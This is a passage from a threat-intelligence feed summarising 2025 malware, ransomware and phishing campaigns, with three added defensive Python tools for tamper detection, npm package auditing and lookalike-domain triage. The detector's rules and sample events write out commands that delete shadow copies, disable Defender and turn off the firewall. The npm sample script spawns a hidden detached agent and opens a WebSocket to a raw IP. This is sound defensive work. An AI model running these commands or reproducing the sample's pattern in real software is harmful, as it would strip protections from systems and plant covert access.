Researchers at ANY.RUN and BlockOSINT have identified PyLangGhost RAT, a Python-based successor to GoLangGhost RAT, attributed to the North Korean Lazarus subgroup Famous Chollima. This malware employs a unique “ClickFix” social engineering lure, masquerading as fake camera or microphone errors during job interviews to deceive developers and executives into executing malicious scripts. Once installed, the RAT establishes persistence via a Run key, disguises its python.exe process as csshost.exe, and initiates raw-IP HTTP communication with its command-and-control servers using weak RC4/MD5 encryption. Its modular capabilities enable system reconnaissance, theft of credentials and cryptocurrency wallets by decrypting Chrome’s DPAPI keys, and exfiltration of data as compressed archives. The campaign primarily targets organizations in the finance, technology, and cryptocurrency sectors, with a particular focus on browser-stored credentials and wallet configurations.
Source: https://any.run/cybersecurity-blog/pylangghost-malware-analysis/
2025-08-07
Malicious_Driver_Use_in_Akira_SonicWall_Attack
HIGH
+
Intel Source:
GuidePoint Security
Intel Name:
Malicious_Driver_Use_in_Akira_SonicWall_Attack
Date of Scan:
2025-08-07
Impact:
HIGH
Summary:
Researchers at GuidePoint Security have observed Akira ransomware affiliates using a Bring Your Own Vulnerable Driver (BYOVD) technique to bypass antivirus and EDR defenses. The activity typically follows initial access via abuse of SonicWall SSL VPN, is motivated by financial gain through ransomware deployment, and in several incident response cases has been directly linked to successful Akira encryptions. The attackers register rwdrv.sys, a legitimate signed driver associated with the ThrottleStop utility, as a service to obtain kernel-level privileges, then deploy a second, malicious driver, hlpdrv.sys, which uses regedit.exe to set the Windows Defender DisableAntiSpyware policy. This disables key endpoint protection features, increasing the likelihood of undetected operations and successful encryption of critical data. The campaign appears to target organizations using SonicWall VPNs, with activity traced back to at least July 15, 2025.
Source: https://www.guidepointsecurity.com/blog/gritrep-akira-sonicwall/
2025-08-07
EPI_PDF_Browser_Hijacker
LOW
+
Intel Source:
Mcafee
Intel Name:
EPI_PDF_Browser_Hijacker
Date of Scan:
2025-08-07
Impact:
LOW
Summary:
Researchers at McAfee Labs have observed a deceptive installer masquerading as a PDF converter that silently deploys a Chromium-based browser extension to redirect homepages and searches. The utility, distributed via consumer software download sites in Q2 2025, imports existing browser settings by default and alters them without explicit consent. Analysis of over 118,000 device encounters in the United States highlights widespread exposure to this potentially unwanted program. The tactic leverages user inattention to default install options and opaque privacy disclosures to monetize free downloads through forced search-engine changes. These hijacking actions degrade user experience, compromise privacy, and may serve as a beachhead for further exploitation.
Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/think-before-you-click-epi-pdfs-hidden-extras/
2025-08-05
REMCOS_Backdoor
MEDIUM
+
Intel Source:
PointWild
Intel Name:
REMCOS_Backdoor
Date of Scan:
2025-08-05
Impact:
MEDIUM
Summary:
According to researchers at Point Wild, the Trojan.WinLNK/PowerShell Runner campaign uses malicious Windows shortcut (.LNK) files delivered via spear-phishing emails to deploy the REMCOS backdoor. The shortcuts impersonate invoice documents but execute hidden PowerShell commands. The script downloads a payload disguised as an image file, writes it out as an executable named CHROME.PIF, and launches it. Once active, REMCOS gives attackers full remote access to the compromised system, including keystroke logging, command execution, file transfer, and complete system control. It communicates with its C2 server over a custom TCP channel through a renamed Windows utility such as colorcpl.exe, and it stays active by creating scheduled tasks and adding itself to the system's startup entries.
Source: https://www.pointwild.com/threat-intelligence/trojan-winlnk-powershell-runner
2025-08-05
Akira_Exploits_SonicWallVPNZeroDay
HIGH
+
Intel Source:
Team Huntress
Intel Name:
Akira_Exploits_SonicWallVPNZeroDay
Date of Scan:
2025-08-05
Impact:
HIGH
Summary:
According to Team Huntress, threat actors are actively exploiting a likely zero-day vulnerability in SonicWall Secure Mobile Access and firewall appliances to bypass MFA controls and gain initial access. Using over-privileged service accounts and built-in Windows tools, they rapidly establish Cloudflared and OpenSSH tunnels for persistence while leveraging WMI and PowerShell Remoting to pivot to domain controllers. Post-exploitation activity includes dumping and decrypting Veeam backup credentials and extracting the NTDS.dit database for offline cracking. Defenses are systematically disabled through Set-MpPreference and netsh commands before Akira ransomware is deployed and Volume Shadow Copies are deleted with vssadmin.exe. Affected environments include ones with MFA enabled, which highlights the vulnerability's potency and operational impact. The campaign's objective appears to be financial gain via ransomware, posing a significant threat to data availability and business continuity. Organizations with exposed SonicWall VPN infrastructure face a heightened risk of rapid network compromise and should urgently validate their security posture.
Source: https://www.huntress.com/blog/exploitation-of-sonicwall-vpn
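The MedusaLocker AV-killer, Akira BYOVD and Akira SonicWall entries above share a set of defense-evasion steps that show up in endpoint telemetry: a known-abused driver is loaded, Defender is switched off through Set-MpPreference or the DisableAntiSpyware policy, shadow copies are deleted and the firewall is disabled. The detection logic below is an added example, not tooling from Kaspersky, GuidePoint or Huntress; the event schema and the sample events are constructed, and the driver names are the ones the three reports cite.

```python
"""Rule-based detection over Sysmon-style events for the AV/EDR-killing
steps in the three entries above. Added example; telemetry is constructed."""
import re
from typing import Dict, List, NamedTuple, Set

# Driver file names the reports associate with AV/EDR killing
# (throttlestop.sys is the original name of the ThrottleStop driver).
ABUSED_DRIVERS = {"rwdrv.sys", "hlpdrv.sys", "throttlestop.sys", "throttleblood.sys"}

PROCESS_RULES = [
    ("defender_tamper", re.compile(r"Set-MpPreference\s+.*-Disable\w+\s+\$?true", re.I)),
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("firewall_disabled", re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("regedit_silent_import", re.compile(r"regedit(\.exe)?\s+/s\b", re.I)),
]
# Registry writes that disable Defender by policy (what hlpdrv.sys does via regedit).
DEFENDER_POLICY = re.compile(r"\\Windows Defender\\Disable(AntiSpyware|AntiVirus)$", re.I)
TAMPER_RULES = {"defender_tamper", "defender_policy_disabled", "shadow_copy_deletion",
                "firewall_disabled", "regedit_silent_import"}


class Alert(NamedTuple):
    host: str
    rule: str
    severity: str
    evidence: str


def detect(events: List[Dict]) -> List[Alert]:
    """Apply the per-event rules. Each event is a dict in the constructed schema."""
    alerts: List[Alert] = []
    for ev in events:
        kind = ev["type"]
        if kind == "driver_load":
            name = ev["image"].rsplit("\\", 1)[-1].lower()
            if name in ABUSED_DRIVERS:
                alerts.append(Alert(ev["host"], "byovd_driver_load", "high", ev["image"]))
        elif kind == "process":
            for rule, rx in PROCESS_RULES:
                if rx.search(ev["cmd"]):
                    alerts.append(Alert(ev["host"], rule, "medium", ev["cmd"]))
        elif kind == "registry":
            if DEFENDER_POLICY.search(ev["path"]) and int(ev.get("value", 0)) == 1:
                alerts.append(Alert(ev["host"], "defender_policy_disabled", "high", ev["path"]))
    return alerts


def escalate(alerts: List[Alert]) -> Set[str]:
    """Hosts that combine a BYOVD load with any tamper rule, or that hit two or
    more distinct tamper rules, are the ones to isolate first."""
    rules_by_host: Dict[str, Set[str]] = {}
    for a in alerts:
        rules_by_host.setdefault(a.host, set()).add(a.rule)
    critical = set()
    for host, rules in rules_by_host.items():
        tamper = rules & TAMPER_RULES
        if ("byovd_driver_load" in rules and tamper) or len(tamper) >= 2:
            critical.add(host)
    return critical


# Constructed sample telemetry (not real events from any of the reports).
SAMPLE_EVENTS = [
    {"ts": "2025-08-01T02:10:05Z", "host": "WS01", "type": "driver_load",
     "image": r"C:\ProgramData\rwdrv.sys"},
    {"ts": "2025-08-01T02:10:09Z", "host": "WS01", "type": "driver_load",
     "image": r"C:\ProgramData\hlpdrv.sys"},
    {"ts": "2025-08-01T02:10:12Z", "host": "WS01", "type": "registry",
     "path": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware", "value": 1},
    {"ts": "2025-08-01T02:11:40Z", "host": "SRV02", "type": "process",
     "cmd": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2025-08-01T02:12:01Z", "host": "SRV02", "type": "process",
     "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2025-08-01T02:12:05Z", "host": "SRV02", "type": "process",
     "cmd": "netsh advfirewall set allprofiles state off"},
    {"ts": "2025-08-01T03:00:00Z", "host": "WS03", "type": "process",
     "cmd": "powershell.exe Get-MpPreference"},  # benign: read-only query
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.severity}] {a.host} {a.rule}: {a.evidence}")
    print("isolate first:", sorted(escalate(found)))
```

The driver-name match is deliberately on the file name rather than the path, because the reports show the drivers dropped from arbitrary locations; in production the list should be fed from a BYOVD blocklist such as Microsoft's vulnerable-driver list rather than hand-maintained, and `escalate` is where a SOC would attach auto-isolation.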
2025-08-05
Plague_Linux_Backdoor
MEDIUM
+
Intel Source:
Nextron
Intel Name:
Plague_Linux_Backdoor
Date of Scan:
2025-08-05
Impact:
MEDIUM
Summary:
Researchers at Nextron have discovered a Linux backdoor known as Plague that gives attackers persistent SSH access by bypassing standard login checks. It is implemented as a malicious Pluggable Authentication Module (PAM), so it can grant unauthorized logins without raising alarms. Plague obfuscates its strings with XOR encoding, RC4-style KSA/PRGA routines and a DRBG to hide its presence in the binary, runs checks to avoid sandbox environments, and accepts hardcoded credentials for access. Once active, it covers its tracks by disabling shell command history and removing traces of its SSH sessions.
Source: https://www.nextron-systems.com/2025/08/01/plague-a-newly-discovered-pam-based-backdoor-for-linux/
2025-08-05
APT37_Use_RokRAT_Malware
MEDIUM
+
Intel Source:
Genians
Intel Name:
APT37_Use_RokRAT_Malware
Date of Scan:
2025-08-05
Impact:
MEDIUM
Summary:
Researchers at Genians have discovered a new cyber-espionage campaign linked to the North Korea-linked group APT37, involving an updated version of its RokRAT malware that operates entirely in memory. The attack begins when a user opens a malicious LNK file, which silently executes a PowerShell script that injects hidden code into legitimate programs such as Notepad or Paint. In a recent variant the attackers used steganography, embedding the second-stage payload inside JPEG images to evade detection. The malware communicates with its C2 servers through cloud storage platforms such as Dropbox, pCloud, and Yandex Disk, exfiltrating data with access tokens that have since been revoked.
Source: https://www.genians.co.kr/en/blog/threat_intelligence/rokrat_shellcode_steganographic
2025-08-04
Malicious_NPM_and_PyPI_Packages
LOW
+
Intel Source:
Fortinet
Intel Name:
Malicious_NPM_and_PyPI_Packages
Date of Scan:
2025-08-04
Impact:
LOW
Summary:
Researchers at FortiGuard Labs have discovered a series of malicious open-source packages uploaded to the NPM and PyPI repositories. These packages have minimal file structures, lack repository links, and execute scripts at install time to silently deploy encrypted payloads. The identified packages, simple-mali-pkg, confighum, sinontop-utils, solana-sdkpy, and postcss-theme-vars (v7.0.7), run obfuscated Python or JavaScript code during installation to harvest browser-stored credentials and cryptocurrency wallet keys. The stolen data is exfiltrated to attacker-controlled servers over encrypted WebSocket or HTTP channels. The packages mainly hit developers and end users who unknowingly include them in their projects; if successful, the attackers can gain access to sensitive systems.
Source: https://www.fortinet.com/blog/threat-research/malicious-packages-across-open-source-registries
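Both the @kodane/patch-manager entry and the FortiGuard entry above describe the same package shape: an install-time lifecycle hook, no repository link, a handful of files, and source that starts a detached background process, writes into a hidden cache directory and opens an unauthenticated WebSocket to a raw IP. The audit below is an added example, not code from Safety or FortiGuard; the manifest, the script body and the package name are constructed, and the signal list is a starting point rather than the vendors' detection logic.

```python
"""Static pre-install checks for an npm package: manifest-level red flags
plus source-level primitives a "registry cache manager" has no reason to
combine. Added example; the sample manifest and script are constructed."""
import re
from typing import Dict, List

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Hook commands that fetch, decode or evaluate code during installation.
REMOTE_OR_EVAL = re.compile(
    r"\b(curl|wget|node\s+-e|eval|base64|bash\s+-c|powershell)\b", re.I)

# Source-level signals; each maps a label to a pattern in the package's JS.
SOURCE_SIGNALS = {
    "detached background process": re.compile(r"spawn\([^)]*detached\s*:\s*true", re.S),
    "hidden cache/config directory": re.compile(r"['\"][^'\"]*/\.(cache|config)/"),
    "WebSocket to a raw IP address": re.compile(
        r"new\s+WebSocket\(\s*['\"]wss?://\d{1,3}(?:\.\d{1,3}){3}"),
    "reads a Solana keypair": re.compile(r"solana/id\.json|Keypair\.fromSecretKey"),
}


def audit_manifest(manifest: Dict, file_count: int) -> List[str]:
    """Flag install-time hooks, missing provenance and a minimal file set."""
    findings: List[str] = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"lifecycle hook '{hook}' runs at install time: {cmd}")
        if REMOTE_OR_EVAL.search(cmd):
            findings.append(f"hook '{hook}' fetches or evaluates code: {cmd}")
    if not manifest.get("repository"):
        findings.append("no repository link; provenance cannot be checked")
    if file_count <= 3:
        findings.append(f"minimal file structure ({file_count} files)")
    return findings


def audit_source(source: str) -> List[str]:
    """Return the labels of every source-level signal present in the JS text."""
    return [label for label, rx in SOURCE_SIGNALS.items() if rx.search(source)]


def verdict(manifest_findings: List[str], source_findings: List[str]) -> str:
    """An install hook combined with any network/wallet signal is enough to block."""
    has_hook = any(f.startswith("lifecycle hook") for f in manifest_findings)
    if has_hook and source_findings:
        return "block"
    if has_hook or source_findings:
        return "review"
    return "allow"


def audit_package(manifest: Dict, file_count: int, source: str) -> Dict:
    m = audit_manifest(manifest, file_count)
    s = audit_source(source)
    return {"manifest": m, "source": s, "verdict": verdict(m, s)}


# Constructed sample: the package name is made up, the IP is TEST-NET-3.
SAMPLE_MANIFEST = {
    "name": "@example/registry-cache-tool",
    "version": "1.0.0",
    "description": "Registry cache manager",
    "scripts": {"postinstall": "node scripts/setup.js"},
}
SAMPLE_SETUP_JS = r"""
const { spawn } = require('child_process');
const os = require('os');
const dir = os.homedir() + '/.config/cache-tool/';
spawn(process.execPath, [dir + 'agent.js'], { detached: true, stdio: 'ignore' }).unref();
const ws = new WebSocket('ws://203.0.113.10:8080');
"""

if __name__ == "__main__":
    result = audit_package(SAMPLE_MANIFEST, 3, SAMPLE_SETUP_JS)
    for line in result["manifest"] + result["source"]:
        print(" -", line)
    print("verdict:", result["verdict"])
```

A practical way to run this is against the unpacked tarball from `npm pack` before the package is allowed into a private registry; `npm install --ignore-scripts` in CI removes the install-time execution path entirely, which is the control both entries point at.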
2025-08-04
Scattered_Spider_Domain_Spoofing_Surge
MEDIUM
+
Intel Source:
ISC.SANS
Intel Name:
Scattered_Spider_Domain_Spoofing_Surge
Date of Scan:
2025-08-04
Impact:
MEDIUM
Summary:
Researchers at ISC.SANS have observed Scattered Spider registering deceptive domain names that mimic legitimate enterprise services to support social engineering operations. The threat actor, already profiled in recent CISA advisories, demonstrates continued reliance on brand impersonation and credential harvesting tactics to gain unauthorized access to target networks. SANS analysis identified recurring patterns in newly registered domains that suggest preparation for phishing campaigns or pretext-based attacks, though no active exploitation has yet been confirmed. The emergence of new naming conventions, not previously reported, reflects a shift in tradecraft and indicates the actor’s operational flexibility.
Source: https://isc.sans.edu/diary/Scattered+Spider+Related+Domain+Names/32162
2025-07-31
Fake_ClickFix_Pages_Spread_Epsilon_Red_Ransomware
MEDIUM
+
Intel Source:
CloudSEK
Intel Name:
Fake_ClickFix_Pages_Spread_Epsilon_Red_Ransomware
Date of Scan:
2025-07-31
Impact:
MEDIUM
Summary:
CloudSEK researchers have discovered that since July 2025, threat actors have been tricking users worldwide into executing malicious .HTA files through fake ClickFix verification pages impersonating popular platforms like Discord, Twitch, and OnlyFans to deploy Epsilon Red ransomware. Users who follow the on-screen prompts unknowingly activate an ActiveXObject that uses a hidden curl-and-execute command to silently download and run the payload. This campaign relies on social engineering and browser-based compromise, rather than traditional phishing emails, allowing it to evade download protections and raise less suspicion. Once executed, the malware initiates web-based C2 communication over TCP port 2269, resulting in full ransomware deployment. The method enables remote code execution and data encryption without user awareness, leading to severe operational disruption and financial loss.
Source: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware
2025-07-31
Cyber_Stealer_Malware_as_a_Service
MEDIUM
+
Intel Source:
Esentire
Intel Name:
Cyber_Stealer_Malware_as_a_Service
Date of Scan:
2025-07-31
Impact:
MEDIUM
Summary:
Researchers at eSentire have observed the emergence and rapid evolution of Cyber Stealer, a sophisticated Malware-as-a-Service (MaaS) first identified in May 2025. Developed by an actor operating under the alias “Cyber Products,” the malware is actively maintained and updated in response to user feedback on underground forums, signaling an agile development lifecycle and customer-driven feature roadmap. Written in C#, Cyber Stealer is capable of stealing credentials, session data, autofill content, and files from a wide range of applications including browsers, cloud storage, password managers, gaming clients, messaging platforms, and cryptocurrency wallets. It employs evasive techniques such as PowerShell-based Windows Defender bypass, DNS spoofing via hosts file manipulation, and clipboard hijacking for crypto theft.
Source: https://www.esentire.com/blog/cyber-stealer-analysis-when-your-malware-developer-has-fomo-about-features
2025-07-30
Supply_Chain_Attack_via_Scavenger_Malware
MEDIUM
+
Intel Source:
Crowdstrike
Intel Name:
Supply_Chain_Attack_via_Scavenger_Malware
Date of Scan:
2025-07-30
Impact:
MEDIUM
Summary:
According to CrowdStrike's analysis, on July 18, 2025 an unknown adversary compromised multiple popular NPM packages to deploy a two-stage loader dubbed "Scavenger" that targets developer environments. The attackers gained access by phishing an NPM maintainer with a spoofed login page on a typosquatted domain, then injected a first-stage JavaScript installer that invokes a malicious DLL via rundll32.exe. Once loaded, the Scavenger DLL harvests NPM credentials and browser data before dropping a second-stage infostealer payload, risking credential theft and exposure of proprietary development assets. Exploitation of the open NPM ecosystem amplifies the impact across on-premises and cloud-based infrastructure and complicates detection. CrowdStrike Falcon blocked the threat at initial execution through behavior-based detections and quarantine of the malicious components.
Source: https://www.crowdstrike.com/en-us/blog/crowdstrike-falcon-prevents-npm-package-supply-chain-attacks/
2025-07-30
ToolShell_Zero_Day_in_SharePoint
HIGH
+
Intel Source:
Imperva
Intel Name:
ToolShell_Zero_Day_in_SharePoint
Date of Scan:
2025-07-30
Impact:
HIGH
Summary:
Imperva Threat Researchers have observed active exploitation of CVE-2025-53770, a critical deserialization vulnerability in on-premises SharePoint Server 2016, 2019 and Subscription Edition that permits unauthenticated remote code execution. Campaigns began immediately after Microsoft's July 2025 Patch Tuesday release and have scanned tens of thousands of sites across 34 countries. Clusters tracked as Linen Typhoon and Violet Typhoon, linked to China, have chained ToolShell with privilege escalation and spoofing exploits to deploy web shells, harvest credentials and maintain persistent access.
Source: https://www.imperva.com/blog/imperva-customers-protected-against-critical-toolshell-zero%e2%80%91day-in-microsoft-sharepoint/
2025-07-30
SilverTerrier_BEC_Targets_Aviation_Execs
MEDIUM
+
Intel Source:
Krebsonsecurity
Intel Name:
SilverTerrier_BEC_Targets_Aviation_Execs
Date of Scan:
2025-07-30
Impact:
MEDIUM
Summary:
Researchers at KrebsOnSecurity have identified an ongoing business email compromise (BEC) campaign orchestrated by the Nigerian cybercrime group SilverTerrier, targeting executives in the transportation and aviation sectors. The operation begins with a phishing lure that impersonates a Microsoft 365 login page, capturing executive credentials. Once inside the victim's inbox, the attackers exfiltrate invoice-related communications, fabricate near-identical invoices, and send them to customers using lookalike domains registered just hours after compromise. At least one customer was deceived into transferring a six-figure sum to the attackers. Infrastructure analysis links these spoofed domains to a threat actor known as “Justy John,” whose aliases and contact information appear in hundreds of domain registrations tied to previous BEC scams.
Source: https://krebsonsecurity.com/2025/07/phishers-target-aviation-execs-to-scam-customers/
2025-07-29
RokRAT_Distribute_through_Malicious_Hangul_Document
LOW
+
Intel Source:
ASEC
Intel Name:
RokRAT_Distribute_through_Malicious_Hangul_Document
Date of Scan:
2025-07-29
Impact:
LOW
Summary:
ASEC researchers have identified a malware strain known as RokRAT being distributed through malicious Hangul Word Processor (HWP) documents, a format commonly used in South Korea. The documents impersonate content related to North Korea's grain sales office and contain a deceptive link labelled Reference material.docx. When it is clicked, the document triggers a hidden process that silently executes a legitimate program (ShellRunas.exe) alongside a malicious DLL (crediu.dll). The DLL connects to Dropbox to download a JPG image that secretly contains the code used to activate RokRAT directly in memory, leaving no payload on disk. Once active, RokRAT lets attackers collect sensitive user data and remotely control the compromised system.
Source: https://asec.ahnlab.com/ko/89116/
2025-07-29
Telegram_Driven_Raven_Stealer
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
Telegram_Driven_Raven_Stealer
Date of Scan:
2025-07-29
Impact:
MEDIUM
Summary:
Researchers from CYFIRMA have identified Raven Stealer, a lightweight Delphi/C++-based infostealer leveraging Telegram for real-time data exfiltration. Promoted through a GitHub repository and Telegram channel operated by the ZeroTrace Team, Raven enables low-skill actors to steal browser credentials, payment data, and session cookies from Chromium-based browsers via in-memory DLL injection and reflective process hollowing. The malware launches browsers in suspended mode, bypasses sandboxing, and decrypts payloads directly into memory, avoiding disk writes and user detection. Exfiltrated data is archived and uploaded through Telegram’s API using embedded bot tokens and chat IDs, allowing attackers to maintain anonymity and evade traditional C2 detection. Raven’s modular builder, UPX packing, and obfuscation techniques streamline campaign deployment and detection evasion.
Source: https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/
2025-07-29
UNG0901_Targets_Russian_Entities
LOW
+
Intel Source:
Seqrite
Intel Name:
UNG0901_Targets_Russian_Entities
Date of Scan:
2025-07-29
Impact:
LOW
Summary:
Researchers at SEQRITE Labs have uncovered a cyber-espionage campaign by the threat group UNG0901 targeting entities in Russia's aerospace and defense sectors. The attackers send spear-phishing emails with a malicious .EML attachment that impersonates a Russian logistics center. On opening, the email drops a decoy document that in turn deploys a hidden shortcut (.LNK) file, which silently runs PowerShell and rundll32 to activate a custom implant called EAGLET. Once active, EAGLET collects system and network details and communicates with its C2 server over HTTP disguised as Microsoft App Store traffic. It supports remote command execution, file exfiltration, and automated transmission of collected data.
Source: https://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/
2025-07-29
Evacuatio_Flight_Scam
LOW
+
Intel Source:
Fortinet
Intel Name:
Evacuatio_Flight_Scam
Date of Scan:
2025-07-29
Impact:
LOW
Summary:
FortiGuard researchers uncovered a phishing campaign that exploited the Middle East conflict by registering the domain lineageembraer.online, impersonating a luxury airline offering emergency evacuation flights from Tel Aviv to New York. The fraudulent site listed seats at $2,166 each and included a Book Now button and an Instruction link, both designed to harvest personal information and banking credentials. Clicking Book Now opened a pre-filled email draft addressed to lineageembraer@gmail.com, while the Instruction link downloaded a PDF hosted on a Shopify CDN that requested sensitive data such as passport numbers, home addresses, and other high-value identity information.
Source: https://www.fortinet.com/blog/threat-research/a-special-mission-to-nowhere
2025-07-28
Compromised_SendGrid_Account_Phishing_Campaign
MEDIUM
+
Intel Source:
KB4ThreatLabs
Intel Name:
Compromised_SendGrid_Account_Phishing_Campaign
Date of Scan:
2025-07-28
Impact:
MEDIUM
Summary:
KnowBe4 researchers have uncovered an active phishing campaign, ongoing since July 2025, that uses compromised SendGrid accounts to target other SendGrid customers. The attackers use technical-themed lures such as "API Errors Impacting Email Delivery" and "Webhook Endpoint Unresponsive" to trick recipients into submitting credentials on fake "settings adjustment" pages. By reusing the stolen credentials, the threat actors expand their access to trusted sending platforms; because the mail is sent through an authorized provider, it passes SPF and DKIM checks and enjoys high deliverability. Subject lines tailored to SendGrid's technical audience increase credibility and click-through rates, enabling mass credential harvesting. The campaign's self-propagating nature significantly amplifies its reach, raising the risk of account takeovers and data exfiltration across a broader set of organizations.
Source: https://x.com/Kb4Threatlabs/status/1948364376236601487
2025-07-28
NPM_Phishing_Campaign_Targets_Developers
LOW
+
Intel Source:
Socket
Intel Name:
NPM_Phishing_Campaign_Targets_Developers
Date of Scan:
2025-07-28
Impact:
LOW
Summary:
Researchers at Socket discovered a phishing campaign where attackers impersonate the official npm support team by leveraging a typosquatted domain closely resembling the legitimate one. The primary objective is to steal developers’ login credentials and access tokens, potentially allowing them to compromise the software supply chain. The attackers replicated the official npm login page and embedded unique tracking tokens to track victims and autofill their details. The campaign primarily targets maintainers of popular npm packages, potentially impacting approximately 34 million weekly downloads.
Source: https://socket.dev/blog/npm-phishing-email-targets-developers-with-typosquatted-domain
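The APT36, Scattered Spider, SilverTerrier and npm-phishing entries above all turn on lookalike domains: typo-squats, brand names embedded in a longer label, and character swaps such as "rn" for "m". The triage below is an added example, not tooling from Cyfirma, SANS ISC, KrebsOnSecurity or Socket: it normalises common substitutions, strips the public suffix, and flags a registrable label that equals, embeds or sits within one edit of a protected brand. The brand list, the allowlist of legitimate domains and the candidate domains are constructed; it generalises the single-brand case in each entry to a list of brands.

```python
"""Lookalike-domain triage against a list of protected brand tokens.
Added example; brands, allowlist and sample domains are constructed."""
from typing import Dict, Iterable, Optional, Tuple

BRANDS = ("npmjs", "microsoft", "kavach")                  # constructed list
LEGITIMATE = {"npmjs.com", "microsoft.com", "kavach.mail.gov.in"}  # allowlist
MULTI_LABEL_SUFFIXES = {"co.uk", "gov.in", "nic.in", "co.in", "com.au"}
# Visual substitutions common in typosquats, applied before comparison.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"),
               ("3", "e"), ("5", "s"), ("7", "t"))


def registrable_label(domain: str) -> str:
    """The label the registrant chose: 'npmjs-support' for npmjs-support.org,
    'mail' for mail.gov.in (two-label public suffixes are handled explicitly)."""
    labels = domain.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return labels[-3]
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalize(label: str) -> str:
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Standard edit distance (insert, delete, substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(domain: str, brands: Iterable[str] = BRANDS,
           max_distance: int = 1) -> Optional[Tuple[str, str]]:
    """Return (brand, reason) when the domain looks like an impersonation, else None."""
    domain = domain.lower().strip(".")
    if domain in LEGITIMATE or any(domain.endswith("." + d) for d in LEGITIMATE):
        return None
    label = registrable_label(domain)
    norm = normalize(label)
    tokens = set(label.split("-"))
    for brand in brands:
        if norm == brand:
            return brand, "character substitution of brand"
        if brand in tokens and label != brand:
            return brand, "brand embedded with extra tokens"
        if levenshtein(norm, brand) <= max_distance:
            return brand, f"within edit distance {max_distance} of brand"
    return None


def triage(domains: Iterable[str]) -> Dict[str, Tuple[str, str]]:
    """Map each flagged domain to its (brand, reason); clean domains are omitted."""
    return {d: r for d in domains if (r := assess(d)) is not None}


# Constructed candidates, e.g. from a newly-registered-domain feed or CT logs.
SAMPLE_DOMAINS = ["npnjs.com", "npmjs-support.org", "rnicrosoft.com",
                  "kavach-gov-in.com", "npmjs.com", "example.com", "mail.gov.in"]

if __name__ == "__main__":
    for d, (brand, reason) in triage(SAMPLE_DOMAINS).items():
        print(f"{d}: {reason} ({brand})")
```

Feed it newly registered domains or certificate-transparency entries; the edit-distance threshold should stay at one for short brands, since two edits on a five-letter label matches far too much, and the allowlist matters because the legitimate domain itself is always distance zero.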
2025-07-28
Silver_Fox_Rootkits_Exploit_Expired_Signatures
MEDIUM
+
Intel Source:
Eagle Eye Threat Intelligence
Intel Name:
Silver_Fox_Rootkits_Exploit_Expired_Signatures
Date of Scan:
2025-07-28
Impact:
MEDIUM
Summary:
Researchers at Eagle Eye Threat Intelligence Center have identified a new variant of the “Silver Fox” malware campaign, characterized by the deployment of multiple kernel-mode rootkits using expired or weakly validated digital signatures. Initially detected by the Kingsoft Antivirus team, the threat manifests through anomalous user behavior such as autonomous mouse movements and mass virus file dissemination. The malware is distributed via counterfeit installers mimicking legitimate software (e.g., CMake), containing signed drivers such as rdwdrv.sys, Cndom6.sys, Xiaoh1.sys, and NSedKrn1.sys. These drivers abuse outdated or forged certificates from Chinese firms, enabling stealthy kernel-level API hooking (via InfinityHook), network stack manipulation, and process termination without triggering user access controls.
Source: https://mp.weixin.qq.com/s?__biz=MzU2OTcxNjE4Mw==&mid=2247486072&idx=1&sn=ce36707ae3974cc872b4432a8edf2dee&poc_token=HGdFg2ijMJ92hAeDFnft9JkNk3itOnTghTuuI-QI
2025-07-28
DarkHotel_Targets_Windows_via_Fake_Installers
MEDIUM
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
DarkHotel_Targets_Windows_via_Fake_Installers
Date of Scan:
2025-07-28
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center have discovered that since October 2024, the North Korean–linked threat actor APT-C-06 (DarkHotel) has been distributing malicious input-method installer programs—initially "hana9.30_x64_9.exe" and later "winrar-x64-540.exe"—via Baidu Netdisk, WeChat, and USB drives to compromise Windows systems ranging from XP to Server 2008. Once executed, these installers drop a second-stage DLL (DarkSeal) into the execution directory, establish persistence through a scheduled task that launches a legitimate-looking copy-machine program, and spawn a dllhost.exe process that performs shellcode injection, replacing its executable with a trusted binary. DarkSeal then leverages DLL hijacking and XOR decryption to reflectively load either a Meterpreter or Thinmon payload, providing covert remote access. The group continues to use a final-stage payload that has remained unchanged since 2022, enabling stealthy, long-term persistence and potential data exfiltration.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507142&idx=1&sn=e22c82e0641be2e7db4310d60668fd2b&poc_token=HCA2g2ijPliapwTTVuVa9AHf-jCacGsQSnSk9s49
2025-07-27
Proxy_Trickster_Targets_Servers_for_Profit
LOW
+
Intel Source:
Solar 4RAYS
Intel Name:
Proxy_Trickster_Targets_Servers_for_Profit
Date of Scan:
2025-07-27
Impact:
LOW
Summary:
